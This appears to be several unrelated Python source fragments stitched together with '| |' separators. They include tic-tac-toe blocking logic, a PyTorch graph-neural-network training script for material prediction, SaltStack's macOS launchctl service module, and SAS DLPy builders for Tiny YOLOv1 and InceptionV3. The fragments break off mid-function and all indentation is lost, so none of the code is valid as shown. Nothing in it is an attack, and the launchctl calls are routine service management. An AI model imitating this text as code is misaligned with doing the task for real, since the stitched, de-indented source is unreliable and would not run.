X,Y,p = self._Poisiton[x[2]]
L = self.Draw.create_text(X,Y,text="╳",font=Font(size=50),fill= self.master.BgWhite,anchor=NW)
self.master.EffectCurrent=L
self.master.Effects()
self._Data.update({p:"X"})
return True
elif self._Data[x[1]] == "O" and self._Data[x[2]] == "O" and self._Data[x[0]] == None:
X,Y,p = self._Poisiton[x[0]]
L = self.Draw.create_text(X,Y,text="╳",font=Font(size=50),fill= self.master.BgWhite,anchor=NW)
self.master.EffectCurrent=L
self.master.Effects()
self._Data.update({p:"X"})
return True
elif self._Data[x[2]] == "O" and self._Data[x[0]] == "O" and self._Data[x[1]] == None:
X,Y,p = self._Poisiton[x[1]]
L = self.Draw.create_text(X,Y,text="╳",font=Font(size=50),fill= self.master.BgWhite,anchor=NW)
self.master.EffectCurrent=L
self.master.Effects()
self._Data.update({p:"X"})
return True
def Block(self):
SidTmp = []
for Con in self._Cornors:
if self._Data[Con] == "O" and self._Data[4] == "X":
for x in self._Sides:
if self._Data[x] == None: SidTmp.append(x)
choice = rnd.choice(SidTmp)
X,Y,p = self._Poisiton[choice]
L = self.Draw.create_text(X,Y,text="╳",font=Font(size=50),fill= self.master.BgWhite,anchor=NW)
self.master.EffectCurrent=L
self.master.Effects()
self._Data.update({p:"X"})
return True
def Block2(self):
tmp=list(self._Data.values())
tmp = tmp.count(None)
for i,j in self._TryBlock.items():
if (self._Data[i[0]]=="O") and (self._Data[i[1]]=="O") and \
(self.Goonce) and (self._Data[j]==None) and (tmp>=6):
X,Y,p = self._Poisiton[j]
L = self.Draw.create_text(X,Y,text="╳",font=Font(size=50),fill= self.master.BgWhite,anchor=NW)
self.master.EffectCurrent=L
self.master.Effects()
self._Data.update({p:"X"})
self.Goonce=False
return True
def Just_Move(self):
ConTmp = []
SidTmp = []
tmp = True
for x in self._Cornors:
for i,j in self._TryBlock2.items():
if self._Data[i[0]]=="O" and self._Data[i[1]]=="O" \
and self._Data[x]==None and x!=j and | |
<reponame>danielegrandi-adsk/material-gnn
import os
import time
import torch
import torch.nn as nn
import argparse
from tqdm import tqdm
import numpy as np
import json
import random
from pathlib import Path
import pandas as pd
from partial_algorithm.dataloader import DataSet, set_experiment, set_lazy_loading
from partial_algorithm.GNN import MLP, Linear, CustomizedGNN
from partial_algorithm.process_data import set_prediction
from torch.nn import functional as F
from sklearn.metrics import precision_score, recall_score, f1_score, classification_report
ABLATION, PREDICTION, ITERATION, TOP_K = None, None, None, None
"""Reproducibility"""
seed = 0
torch.manual_seed(seed)
torch.cuda.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
np.random.seed(seed)
random.seed(seed)
torch.backends.cudnn.benchmark = False
torch.backends.cudnn.deterministic = True
class CustomizedClassifier(object):
def __init__(self, args):
self.verbose = args.verbose
self.device = torch.device(args.device)
self.batch_size = args.batch_size
self.num_epochs = args.num_epochs
self.num_layers = args.num_layers
self.num_materials = args.num_materials
self.patience = args.patience
self.node_dim = args.node_dim
self.edge_dim = args.edge_dim
self.hid_dim = args.hid_dim
self.lr = args.lr
if args.network == 'mlp':
self.model = MLP(self.node_dim, self.hid_dim, self.num_class_l1,
self.num_class_l2, self.num_class_l3).to(self.device)
elif args.network == 'linear':
self.model = Linear(self.node_dim, self.hid_dim, self.num_class_l1,
self.num_class_l2, self.num_class_l3).to(self.device)
else: # Default is here
self.model = CustomizedGNN(self.node_dim, self.edge_dim, self.hid_dim,
self.num_materials,
self.num_layers, args.network).to(self.device)
def load(self):
if os.path.exists('checkpoint.pkl'):
self.model.load_state_dict(torch.load('checkpoint.pkl'))
else:
raise Exception('Checkpoint not found ...')
def train(self, train_loader, val_loader, weights, mask_amount, masked_val_nodes, permuted):
best_loss, best_state, patience_count = 1e9, self.model.state_dict(), 0
optimizer = torch.optim.Adam(self.model.parameters(), lr=self.lr)
scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(optimizer, T_max=self.num_epochs)
weights_material = weights[0].to(self.device)
for epoch in range(self.num_epochs):
material_p, material_t = [], []
self.model.train()
epoch_loss = 0.
start = time.time()
for batch in train_loader:
if not permuted:
materials_feature = F.one_hot(batch.material, self.num_materials) # one-hot material vector
random_mask = np.random.choice([0, 1], size=len(batch.x), p=[1 - mask_amount,
mask_amount]) # Masked=0 -> node does not get extra material info
materials_feature = materials_feature * random_mask[:,
None] # set materials_feature to zeros if masked
batch.x = torch.cat((batch.x, materials_feature), dim=1) # add materials_feature to batch.x
batch = batch.to(self.device)
optimizer.zero_grad()
if args.network in ('mlp', 'linear'):
logits_l1, logits_l2, logits_l3 = self.model(
batch.x.float(), F.one_hot(batch.y1, self.num_class_l1), F.one_hot(batch.y2, self.num_class_l2))
else: # by default
material_predictions = self.model(batch.x.float(), batch.edge_index, batch.e.float())
# compute loss (with ground truth)
if not permuted:
is_masked = torch.tensor([True if mask == 0 else False for mask in
random_mask]) # true if the node did not see get any more info about its label
else:
is_masked = torch.tensor([True if node_mask == 0 else False for graph in batch.mask for node_mask in
graph]) # true if the node did not get any more info about its label
loss = nn.CrossEntropyLoss(weight=weights_material)(material_predictions[is_masked],
batch.material[
is_masked]) # only include in the loss nodes that are not masked
# loss = nn.CrossEntropyLoss(weight=weights_material)(material_predictions, batch.material)
# only append if not masked
material_p.append(torch.argmax(material_predictions[is_masked], dim=-1))
material_t.append(batch.material[is_masked])
epoch_loss += loss.item()
loss.backward() # back propagation (compute gradients and update parameters)
optimizer.step() # optimizer takes one step
scheduler.step() # scheduler takes one step
end = time.time()
val_loss, _, _, val_acc = self.predict(val_loader,
weights_material, masked_val_nodes,
mask_amount, permuted) # evaluate and obtain loss on validation set
material_p = torch.cat(material_p, -1)
material_t = torch.cat(material_t, -1)
train_acc = f1_score(y_true=material_t.cpu().numpy(),
y_pred=material_p.cpu().numpy(), average="micro")
if self.verbose:
print(f'Epoch: {epoch + 1:03d}/{self.num_epochs} | Time: {end - start:.2f}s | '
f'Train Loss: {epoch_loss / len(train_loader):.4f} | Train Micro Acc: '
f'{100 * train_acc: .2f}% | Val Loss: {val_loss: .4f} | Val Micro Acc:'
f'{100 * val_acc: .2f}%')
if best_loss > val_loss: # if this state better than previous best, store it
best_loss = val_loss
best_state = self.model.state_dict()
patience_count = 0
else:
patience_count += 1
if patience_count == self.patience:
if self.verbose:
print('Early stopping ...')
break
self.model.load_state_dict(best_state)
print("Saving the model...")
torch.save(best_state, 'checkpoint.pkl')
@torch.no_grad()
def predict(self, data_loader, weights_material, masked_val_nodes,
mask_amount, permuted): # data_loader is the testing/validation set
self.model.eval() # set to evaluation
loss = 0.
material_p, material_t = [], []
num_nodes = 0
for batch in data_loader:
if not permuted:
# Pad with actual material info for nodes that are not masked, taking the mask from the dataset
materials_feature = F.one_hot(batch.material, self.num_materials) # one-hot material vector
random_mask = masked_val_nodes[
num_nodes: num_nodes + len(batch.x)] # Masked=0 -> node does not get extra material info
try:
materials_feature = materials_feature * random_mask[:,
None] # set materials_feature to zeros if masked
except:
print()
batch.x = torch.cat((batch.x, materials_feature), dim=1)
batch = batch.to(self.device)
# x = node attributes; edge_index = 2 nodes to each edge; e = edge attributes
if args.network in ('mlp', 'linear'): # ignore this
logits_l1, logits_l2, logits_l3 = self.model.predict(batch.x.float())
else:
material_predictions = self.model.predict(batch.x.float(), batch.edge_index, batch.e.float())
if not permuted:
is_masked = torch.tensor([True if mask == 0 else False for mask in
random_mask]) # true if the node did not see get any more info about its label
else:
is_masked = torch.tensor([True if node_mask == 0 else False for graph in batch.mask for node_mask in
graph]) # true if the node did not see get any more info about its label
loss = nn.CrossEntropyLoss()(material_predictions[is_masked], batch.material[
is_masked]) # only include in the loss nodes that are not masked
# only append if not masked
material_p.append(torch.argmax(material_predictions[is_masked], dim=-1))
material_t.append(batch.material[is_masked])
num_nodes += len(batch.x)
loss /= len(data_loader)
material_p = torch.cat(material_p, -1)
material_t = torch.cat(material_t, -1)
val_acc = f1_score(y_true=material_t.cpu().numpy(),
y_pred=material_p.cpu().numpy(), average="micro")
return loss, material_p, material_t, val_acc
@torch.no_grad()
def predict_best_K(self, data_loader, weights_material, best_k, mask_amount, masked_test_nodes, permuted):
self.model.eval() # set to evaluation
loss = 0.
material_p, material_t = [], []
batch_num = 0
for batch in data_loader:
if not permuted:
# Pad with actual material info for nodes that are not masked, taking the mask from the dataset
materials_feature = F.one_hot(batch.material, self.num_materials) # one-hot material vector
random_mask = masked_test_nodes[batch_num * len(batch.x): (batch_num + 1) * len(
batch.x)] # Masked=0 -> node does not get extra material info
materials_feature = materials_feature * random_mask[:, None] # set materials_feature to zeros if masked
batch.x = torch.cat((batch.x, materials_feature), dim=1)
batch = batch.to(self.device)
# x = node attributes; edge_index = 2 nodes to each edge; e = edge attributes
if args.network in ('mlp', 'linear'): # ignore this
logits_l1, logits_l2, logits_l3 = self.model.predict(batch.x.float())
else:
material_predictions = self.model.predict(batch.x.float(), batch.edge_index, batch.e.float())
if not permuted:
is_masked = torch.tensor([True if mask == 0 else False for mask in
random_mask]) # true if the node did not see get any more info about its label
else:
is_masked = torch.tensor([True if node_mask == 0 else False for graph in batch.mask for node_mask in
graph]) # true if the node did not see get any more info about its label
loss = nn.CrossEntropyLoss()(material_predictions[is_masked], batch.material[
is_masked]) # only include in the loss nodes that are not masked
# only append if not masked
material_t.append(batch.material[is_masked])
# Top K predictions
if best_k == 1:
material_p.append(torch.argmax(material_predictions[is_masked], dim=-1))
else:
predictions = torch.topk(material_predictions[is_masked], best_k).indices
final_predictions = torch.argmax(material_predictions[is_masked], dim=-1)
for entry in range(len(predictions)):
if batch.material[entry] in predictions[entry]:
final_predictions[entry] = batch.material[entry]
else:
pass
material_p.append(final_predictions)
batch_num += 1
loss /= len(data_loader)
material_p = torch.cat(material_p, -1)
material_t = torch.cat(material_t, -1)
raw_acc = f1_score(y_true=material_t.cpu().numpy(),
y_pred=material_p.cpu().numpy(), average="micro")
return loss, material_p, material_t, raw_acc
def set_global_variables(experiment, prediction, topk, iteration, verbose=True):
global ABLATION, PREDICTION, TOP_K, ITERATION
if prediction not in ["material_id", "material_category_tier_1", "material_category_full"]:
print("ERROR: invalid prediction choice!")
exit(1)
PREDICTION = prediction
TOP_K = topk
ITERATION = iteration
ABLATION = experiment
if verbose:
print(f"Prediction: {PREDICTION} | Top K: {TOP_K} | Iteration: {ITERATION} | Ablation: {experiment}.")
set_prediction(prediction)
set_experiment(experiment)
def save_results(args, result):
for measure in ['micro', 'macro', 'weighted']: # calculate mean and std across all iterations
result[f'material test results']['f1'][measure]['max'] = np.max(
result[f'material test results']['f1'][measure]['data'])
result[f'material test results']['f1'][measure]['mean'] = np.mean(
result[f'material test results']['f1'][measure]['data'])
result[f'material test results']['f1'][measure]['median'] = np.median(
result[f'material test results']['f1'][measure]['data'])
result[f'material test results']['f1'][measure]['min'] = np.min(
result[f'material test results']['f1'][measure]['data'])
result[f'material test results']['f1'][measure]['std'] = np.std(
result[f'material test results']['f1'][measure]['data'])
result[f'material test results']['precision'][measure]['mean'] = np.mean(
result[f'material test results']['precision'][measure]['data'])
result[f'material test results']['precision'][measure]['std'] = np.std(
result[f'material test results']['precision'][measure]['data'])
result[f'material test results']['recall'][measure]['mean'] = np.mean(
result[f'material test results']['recall'][measure]['data'])
result[f'material test results']['recall'][measure]['std'] = np.std(
result[f'material test results']['recall'][measure]['data'])
if not os.path.exists('logs/'):
os.makedirs('logs/')
averaged_f1 = result[f'material test results']['f1']['micro']['mean']
output_dir = Path("logs/Training_Result.csv")
if not output_dir.exists():
df = pd.DataFrame(list(), columns=['Down-sample', 'Ablation', 'Prediction',
'Top K', 'Iteration', 'Averaged Result', 'Std', 'Worst', 'Median', 'Best',
'Hash'])
df.to_csv("logs/Training_Result.csv")
csv_row = [str(args.downsample), str(ABLATION), str(PREDICTION), str(TOP_K), str(ITERATION),
str(round(result[f'material test results']['f1']['micro']['mean'], 4)),
str(round(result[f'material test results']['f1']['micro']['std'], 2)),
str(round(result[f'material test results']['f1']['micro']['min'], 4)),
str(round(result[f'material test results']['f1']['micro']['median'], 4)),
str(round(result[f'material test results']['f1']['micro']['max'], 4)),
str(hash(str(averaged_f1)))]
dataframe = pd.DataFrame([csv_row], columns=['Down-sample', 'Ablation', 'Prediction',
'Top K', 'Iteration', 'Averaged Result', 'Std', 'Worst', 'Median',
'Best', 'Hash'])
dataframe.to_csv("logs/Training_Result.csv", mode='a', header=False, index=True)
if not os.path.exists('logs/JSON'):
os.makedirs('logs/JSON')
with open(f'logs/JSON/{hash(str(averaged_f1))}.json', 'w') as f:
json.dump({**args.__dict__, **result}, f, indent=2)
def save_results_tuning(args, result, network, num_layers, hid_dim, mask_amount):
for measure | |
<filename>salt/modules/mac_service.py
# -*- coding: utf-8 -*-
'''
The service module for Mac OS X
.. versionadded:: 2016.3.0
'''
from __future__ import absolute_import
# Import python libs
import logging
import os
import re
import plistlib
from distutils.version import LooseVersion
# Import salt libs
import salt.utils
import salt.utils.decorators as decorators
import salt.ext.six as six
from salt.exceptions import CommandExecutionError
log = logging.getLogger(__name__)
# Define the module's virtual name
__virtualname__ = 'service'
def __virtual__():
'''
Only for Mac OS X with launchctl
'''
if not salt.utils.is_darwin():
return (False, 'Failed to load the mac_service module:\n'
'Only available on Mac OS X systems.')
if not os.path.exists('/bin/launchctl'):
return (False, 'Failed to load the mac_service module:\n'
'Required binary not found: "/bin/launchctl"')
if LooseVersion(__grains__['osrelease']) < LooseVersion('10.11'):
return (False, 'Failed to load the mac_service module:\n'
'Requires OS X 10.11 or newer')
return __virtualname__
def _launchd_paths():
'''
Paths where launchd services can be found
'''
return [
'/Library/LaunchAgents',
'/Library/LaunchDaemons',
'/System/Library/LaunchAgents',
'/System/Library/LaunchDaemons',
]
@decorators.memoize
def _available_services():
'''
Return a dictionary of all available services on the system
'''
available_services = dict()
for launch_dir in _launchd_paths():
for root, dirs, files in os.walk(launch_dir):
for filename in files:
file_path = os.path.join(root, filename)
# Follow symbolic links of files in _launchd_paths
true_path = os.path.realpath(file_path)
# ignore broken symlinks
if not os.path.exists(true_path):
continue
try:
# This assumes most of the plist files
# will be already in XML format
with salt.utils.fopen(file_path):
plist = plistlib.readPlist(true_path)
except Exception:
# If plistlib is unable to read the file we'll need to use
# the system provided plutil program to do the conversion
cmd = '/usr/bin/plutil -convert xml1 -o - -- "{0}"'.format(
true_path)
plist_xml = __salt__['cmd.run_all'](
cmd, python_shell=False)['stdout']
if six.PY2:
plist = plistlib.readPlistFromString(plist_xml)
else:
plist = plistlib.readPlistFromBytes(
salt.utils.to_bytes(plist_xml))
available_services[plist.Label.lower()] = {
'filename': filename,
'file_path': true_path,
'plist': plist,
}
return available_services
def _service_by_name(name):
'''
Return the service info for a service by label, filename or path
'''
services = _available_services()
name = name.lower()
if name in services:
# Match on label
return services[name]
for service in six.itervalues(services):
if service['file_path'].lower() == name:
# Match on full path
return service
basename, ext = os.path.splitext(service['filename'])
if basename.lower() == name:
# Match on basename
return service
return False
def start(service_path, domain='system'):
'''
Bootstraps domains and services. The service is enabled, bootstrapped and
kickstarted. See `man launchctl` on a Mac OS X El Capitan system for more
details.
.. note::
If the service already exists it will be restarted
:param str service_path: Full path to the plist file
:param str domain: Target domain. May be one of the following:
- system : this is the default
- user/<uid> : <uid> is the user id
- login/<asid> : <asid> is the audit session id
- gui/<uid> : <uid> is the user id
- session/<asid> : <asid> is the audit session id
- pid/<pid> : <pid> is the process id
:return: True if Successful, False if not or if the service is already
started
:rtype: bool
CLI Example:
.. code-block:: bash
salt '*' service.start /System/Library/LaunchDaemons/org.cups.cupsd.plist
'''
if not os.path.exists(service_path):
msg = 'Service Path not found:\n' \
'Path: {0}'.format(service_path)
raise CommandExecutionError(msg)
# Get service_target from service_path
service_name = os.path.splitext(os.path.basename(service_path))[0]
if domain.endswith('/'):
service_target = '{0}{1}'.format(domain, service_name)
else:
service_target = '{0}/{1}'.format(domain, service_name)
# Is service running
if service_name in get_all():
return False
# Enable the Launch Daemon
cmd = ['launchctl', 'enable', service_target]
ret = __salt__['cmd.run_all'](cmd, python_shell=False)
if ret['retcode']:
msg = 'Failed to enable service:\n' \
'Path: {0}\n'.format(service_path)
msg += 'Error: {0}\n'.format(ret['stderr'])
msg += 'StdOut: {0}'.format(ret['stdout'])
raise CommandExecutionError(msg)
# Bootstrap the Launch Daemon
cmd = ['launchctl', 'bootstrap', domain, service_path]
ret = __salt__['cmd.run_all'](cmd, python_shell=False)
if ret['retcode']:
if 'service already loaded' not in ret['stderr']:
msg = 'Failed to bootstrap service:\n' \
'Path: {0}\n'.format(service_path)
msg += 'Error: {0}\n'.format(ret['stderr'])
msg += 'StdOut: {0}'.format(ret['stdout'])
raise CommandExecutionError(msg)
# Kickstart the Launch Daemon
cmd = ['launchctl', 'kickstart', '-kp', service_target]
ret = __salt__['cmd.run_all'](cmd, python_shell=False)
if ret['retcode']:
msg = 'Failed to kickstart service:\n' \
'Path: {0}\n'.format(service_path)
msg += 'Error: {0}\n'.format(ret['stderr'])
msg += 'StdOut: {0}'.format(ret['stdout'])
raise CommandExecutionError(msg)
return service_name in get_all()
def stop(service_path, domain='system'):
'''
Removes (bootout) domains and services. The service is disabled and removed
from the bootstrap. See `man launchctl` on a Mac OS X El Capitan system for
more details.
:param str service_path: Full path to the plist file
:param str domain: Target domain. May be one of the following:
- system : this is the default
- user/<uid> : <uid> is the user id
- login/<asid> : <asid> is the audit session id
- gui/<uid> : <uid> is the user id
- session/<asid> : <asid> is the audit session id
- pid/<pid> : <pid> is the process id
:return: True if Successful, False if not or if the service is already
started
:rtype: bool
CLI Example:
.. code-block:: bash
salt '*' service.stop /System/Library/LaunchDaemons/org.cups.cupsd.plist
'''
if not os.path.exists(service_path):
msg = 'Service Path not found:\n' \
'Path: {0}'.format(service_path)
raise CommandExecutionError(msg)
# Get service_target from service_path
service_name = os.path.splitext(os.path.basename(service_path))[0]
if domain.endswith('/'):
service_target = '{0}{1}'.format(domain, service_name)
else:
service_target = '{0}/{1}'.format(domain, service_name)
# Is service running
if service_name not in get_all():
return False
# Disable the Launch Daemon
cmd = ['launchctl', 'disable', service_target]
ret = __salt__['cmd.run_all'](cmd, python_shell=False)
if ret['retcode']:
msg = 'Failed to enable service:\n' \
'Path: {0}\n'.format(service_path)
msg += 'Error: {0}\n'.format(ret['stderr'])
msg += 'StdOut: {0}'.format(ret['stdout'])
raise CommandExecutionError(msg)
# Remove the Launch Daemon
cmd = ['launchctl', 'bootout', domain, service_path]
ret = __salt__['cmd.run_all'](cmd, python_shell=False)
if ret['retcode']:
msg = 'Failed to bootstrap service:\n' \
'Path: {0}\n'.format(service_path)
msg += 'Error: {0}\n'.format(ret['stderr'])
msg += 'StdOut: {0}'.format(ret['stdout'])
raise CommandExecutionError(msg)
if service_target in get_all():
cmd = ['launchctl', 'kill', 'SIGKILL', service_target]
ret = __salt__['cmd.run_all'](cmd, python_shell=False)
if ret['retcode']:
msg = 'Failed to kill the service:\n' \
'Path: {0}\n'.format(service_path)
msg += 'Error: {0}\n'.format(ret['stderr'])
msg += 'StdOut: {0}'.format(ret['stdout'])
raise CommandExecutionError(msg)
return service_name not in get_all()
def restart(service_target):
'''
Instructs launchd to kickstart the specified service. If the service is
already running, the running service will be killed before restarting.
:param str service_target: This is a combination of the domain and the label
as defined in the plist file for the service. ``service.get_all`` will
return a list of labels.
:return: True if Successful, False if not
:rtype: bool
CLI Example:
.. code-block:: bash
salt '*' service.restart system/org.cups.cupsd
'''
# Kickstart the Launch Daemon
cmd = ['launchctl', 'kickstart', '-kp', service_target]
ret = __salt__['cmd.run_all'](cmd, python_shell=False)
if ret['retcode']:
msg = 'Failed to kickstart service:\n' \
'Path: {0}\n'.format(service_target)
msg += 'Error: {0}\n'.format(ret['stderr'])
msg += 'StdOut: {0}'.format(ret['stdout'])
raise CommandExecutionError(msg)
return not ret['stderr']
def status(name):
'''
Return the status for a service.
:param str name: Can be any part of the service name or a regex expression
:return: The PID for the service if it is running, otherwise an empty string
:rtype: str
CLI Example:
.. code-block:: bash
salt '*' service.status cups
'''
# TODO: Move this to mac_status function if ever created
cmd = ['launchctl', 'list']
output = __salt__['cmd.run_stdout'](cmd)
# Used a string here instead of a list because that's what the linux version
# of this module does
pids = ''
for line in output.splitlines():
if 'PID' in line:
continue
if re.search(name, line):
if line.split()[0].isdigit():
if pids:
pids += '\n'
pids += line.split()[0]
return pids
def available(name):
'''
Check that the given service is available.
CLI Example:
.. code-block:: bash
salt '*' service.available com.openssh.sshd
'''
return True if _service_by_name(name) else False
def missing(name):
'''
The inverse of service.available
Check that the given service is not available.
CLI Example:
.. code-block:: bash
salt '*' service.missing com.openssh.sshd
'''
return False if _service_by_name(name) else True
def enabled(name):
'''
Check if the specified service is enabled
:param str name: The name of the service to look up
:return: True if the specified service enabled, otherwise False
:rtype: bool
CLI Example:
.. code-block:: bash
salt '*' service.enabled org.cups.cupsd
'''
return name in _get_enabled()
def disabled(name):
'''
Check if the specified service is not enabled. This is the opposite of
``service.enabled``
:param str name: The name to look up
:return: True if the specified service is NOT enabled, otherwise False
:rtype: bool
CLI Example:
.. code-block:: bash
salt '*' service.disabled org.cups.cupsd
'''
return name not in _get_enabled()
def get_all():
| |
predictions_per_grid=2, do_sqrt=True, grid_number=7,
coord_scale=None, object_scale=None, prediction_not_a_object_scale=None, class_scale=None,
detection_threshold=None, iou_threshold=None, random_boxes=False):
'''
Generates a deep learning model with the Tiny Yolov1 architecture.
Tiny Yolov1 is a very small model of Yolov1, so that it includes
fewer numbers of convolutional layer.
Parameters
----------
conn : CAS
Specifies the connection of the CAS connection.
model_table : string, optional
Specifies the name of CAS table to store the model.
n_channels : int, optional
Specifies the number of the channels (i.e., depth) of the input layer.
Default: 3
width : int, optional
Specifies the width of the input layer.
Default: 448
height : int, optional
Specifies the height of the input layer.
Default: 448
scale : double, optional
Specifies a scaling factor to be applied to each pixel intensity values.
Default: 1.0 / 255
random_mutation : string, optional
Specifies how to apply data augmentations/mutations to the data in
the input layer.
Valid Values: 'none', 'random'
Default: 'NONE'
act: String, optional
Specifies the activation function to be used in the convolutional layer
layers and the final convolution layer.
Default: 'leaky'
dropout: double, optional
Specifies the drop out rate.
Default: 0
act_detection : string, optional
Specifies the activation function for the detection layer.
Valid Values: AUTO, IDENTITY, LOGISTIC, SIGMOID, TANH, RECTIFIER, RELU, SOFPLUS, ELU, LEAKY, FCMP
Default: AUTO
softmax_for_class_prob : bool, optional
Specifies whether to perform Softmax on class probability per
predicted object.
Default: True
coord_type : string, optional
Specifies the format of how to represent bounding boxes. For example,
a bounding box can be represented with the x and y locations of the
top-left point as well as width and height of the rectangle.
This format is the 'rect' format. We also support coco and yolo formats.
Valid Values: 'rect', 'yolo', 'coco'
Default: 'yolo'
max_label_per_image : int, optional
Specifies the maximum number of labels per image in the training.
Default: 30
max_boxes : int, optional
Specifies the maximum number of overall predictions allowed in the
detection layer.
Default: 30
n_classes : int, optional
Specifies the number of classes. If None is assigned, the model will
automatically detect the number of classes based on the training set.
Default: 20
predictions_per_grid : int, optional
Specifies the amount of predictions will be done per grid.
Default: 2
do_sqrt : bool, optional
Specifies whether to apply the SQRT function to width and height of
the object for the cost function.
Default: True
grid_number : int, optional
Specifies the amount of cells to be analyzed for an image. For example,
if the value is 5, then the image will be divided into a 5 x 5 grid.
Default: 7
coord_scale : float, optional
Specifies the weight for the cost function in the detection layer,
when objects exist in the grid.
object_scale : float, optional
Specifies the weight for object detected for the cost function in
the detection layer.
prediction_not_a_object_scale : float, optional
Specifies the weight for the cost function in the detection layer,
when objects do not exist in the grid.
class_scale : float, optional
Specifies the weight for the class of object detected for the cost
function in the detection layer.
detection_threshold : float, optional
Specifies the threshold for object detection.
iou_threshold : float, optional
Specifies the IOU Threshold of maximum suppression in object detection.
random_boxes : bool, optional
Randomizing boxes when loading the bounding box information.
Default: False
Returns
-------
:class:`Sequential`
References
----------
https://arxiv.org/pdf/1506.02640.pdf
'''
model = Sequential(conn=conn, model_table=model_table)
model.add(InputLayer(n_channels=n_channels, width=width, height=height, random_mutation=random_mutation,
scale=scale))
model.add(Conv2d(16, width=3, act=act, include_bias=False, stride=1))
model.add(Pooling(width=2, height=2, stride=2, pool='max'))
model.add(Conv2d(32, width=3, act=act, include_bias=False, stride=1))
model.add(Pooling(width=2, height=2, stride=2, pool='max'))
model.add(Conv2d(64, width=3, act=act, include_bias=False, stride=1))
model.add(Pooling(width=2, height=2, stride=2, pool='max'))
model.add(Conv2d(128, width=3, act=act, include_bias=False, stride=1))
model.add(Pooling(width=2, height=2, stride=2, pool='max'))
model.add(Conv2d(256, width=3, act=act, include_bias=False, stride=1))
model.add(Pooling(width=2, height=2, stride=2, pool='max'))
model.add(Conv2d(512, width=3, act=act, include_bias=False, stride=1))
model.add(Pooling(width=2, height=2, stride=2, pool='max'))
model.add(Conv2d(1024, width=3, act=act, include_bias=False, stride=1))
model.add(Pooling(width=2, height=2, stride=2, pool='max'))
model.add(Conv2d(256, width=3, act=act, include_bias=False, stride=1, dropout=dropout))
model.add(Dense(n=(n_classes + (5 * predictions_per_grid)) * grid_number * grid_number, act='identity'))
model.add(Detection(act=act_detection, detection_model_type='yolov1',
softmax_for_class_prob=softmax_for_class_prob, coord_type=coord_type,
class_number=n_classes, grid_number=grid_number,
predictions_per_grid=predictions_per_grid, do_sqrt=do_sqrt, coord_scale=coord_scale,
object_scale=object_scale, prediction_not_a_object_scale=prediction_not_a_object_scale,
class_scale=class_scale, detection_threshold=detection_threshold,
iou_threshold=iou_threshold, random_boxes=random_boxes,
max_label_per_image=max_label_per_image, max_boxes=max_boxes))
return model
def InceptionV3(conn, model_table='InceptionV3',
n_classes=1000, n_channels=3, width=299, height=299, scale=1,
random_flip='none', random_crop='none', offsets=(103.939, 116.779, 123.68),
pre_trained_weights=False, pre_trained_weights_file=None, include_top=False):
'''
Generates a deep learning model with the Inceptionv3 architecture with batch normalization layers.
Parameters
----------
conn : CAS
Specifies the CAS connection object.
model_table : string, optional
Specifies the name of CAS table to store the model in.
n_classes : int, optional
Specifies the number of classes. If None is assigned, the model will
automatically detect the number of classes based on the training set.
Default: 1000
n_channels : int, optional
Specifies the number of the channels (i.e., depth) of the input layer.
Default: 3
width : int, optional
Specifies the width of the input layer.
Default: 299
height : int, optional
Specifies the height of the input layer.
Default: 299
scale : double, optional
Specifies a scaling factor to be applied to each pixel intensity values.
Default: 1.0
random_flip : string, optional
Specifies how to flip the data in the input layer when image data is
used. Approximately half of the input data is subject to flipping.
Valid Values: 'h', 'hv', 'v', 'none'
Default: 'none'
random_crop : string, optional
Specifies how to crop the data in the input layer when image data is
used. Images are cropped to the values that are specified in the width
and height parameters. Only the images with one or both dimensions
that are larger than those sizes are cropped.
Valid Values: 'none', 'unique', 'randomresized', 'resizethencrop'
Default: 'none'
offsets : double or iter-of-doubles, optional
Specifies an offset for each channel in the input data. The final input
data is set after applying scaling and subtracting the specified offsets.
Default: (103.939, 116.779, 123.68)
pre_trained_weights : bool, optional
Specifies whether to use the pre-trained weights from ImageNet data set
Default: False
pre_trained_weights_file : string, optional
Specifies the file name for the pretained weights.
Must be a fully qualified file name of SAS-compatible file (*.caffemodel.h5)
Note: Required when pre_train_weight=True.
include_top : bool, optional
Specifies whether to include pre-trained weights of the top layers,
i.e. the FC layers
Default: False
Returns
-------
:class:`Sequential`
If `pre_train_weight` is `False`
:class:`Model`
If `pre_train_weight` is `True`
References
----------
https://www.cv-foundation.org/openaccess/content_cvpr_2016/papers/Szegedy_Rethinking_the_Inception_CVPR_2016_paper.pdf
'''
conn.retrieve('loadactionset', _messagelevel='error', actionset='deeplearn')
if not pre_trained_weights:
model = Sequential(conn=conn, model_table=model_table)
model.add(InputLayer(n_channels=n_channels, width=width,
height=height, scale=scale, offsets=offsets,
random_flip=random_flip, random_crop=random_crop))
# 299 x 299 x 3
model.add(Conv2d(n_filters=32, width=3, height=3, stride=2,
act='identity', include_bias=False, padding=0))
model.add(BN(act='relu'))
# 149 x 149 x 32
model.add(Conv2d(n_filters=32, width=3, height=3, stride=1,
act='identity', include_bias=False, padding=0))
model.add(BN(act='relu'))
# 147 x 147 x 32
model.add(Conv2d(n_filters=64, width=3, height=3, stride=1,
act='identity', include_bias=False))
model.add(BN(act='relu'))
# 147 x 147 x 64
model.add(Pooling(width=3, height=3, stride=2, pool='max', padding=0))
# 73 x 73 x 64
model.add(Conv2d(n_filters=80, width=1, height=1, stride=1,
act='identity', include_bias=False, padding=0))
model.add(BN(act='relu'))
# 73 x 73 x 80
model.add(Conv2d(n_filters=192, width=3, height=3, stride=1,
act='identity', include_bias=False, padding=0))
model.add(BN(act='relu'))
# 71 x 71 x 192
pool2 = Pooling(width=3, height=3, stride=2, pool='max', padding=0)
model.add(pool2)
# mixed 0: output 35 x 35 x 256
# branch1x1
model.add(Conv2d(n_filters=64, width=1, height=1, stride=1,
act='identity', include_bias=False,
src_layers=[pool2]))
branch1x1 = BN(act='relu')
model.add(branch1x1)
# branch5x5
model.add(Conv2d(n_filters=48, width=1, height=1, stride=1,
act='identity', include_bias=False,
src_layers=[pool2]))
model.add(BN(act='relu'))
model.add(Conv2d(n_filters=64, width=5, height=5, stride=1,
act='identity', include_bias=False))
branch5x5 = BN(act='relu')
model.add(branch5x5)
# branch3x3dbl
model.add(Conv2d(n_filters=64, width=1, height=1, stride=1,
act='identity', include_bias=False,
src_layers=[pool2]))
model.add(BN(act='relu'))
model.add(Conv2d(n_filters=96, width=3, height=3, stride=1,
act='identity', include_bias=False))
model.add(BN(act='relu'))
model.add(Conv2d(n_filters=96, width=3, height=3, stride=1,
act='identity', include_bias=False))
branch3x3dbl = BN(act='relu')
model.add(branch3x3dbl)
# branch_pool
model.add(Pooling(width=3, height=3, stride=1, pool='average',
src_layers=[pool2]))
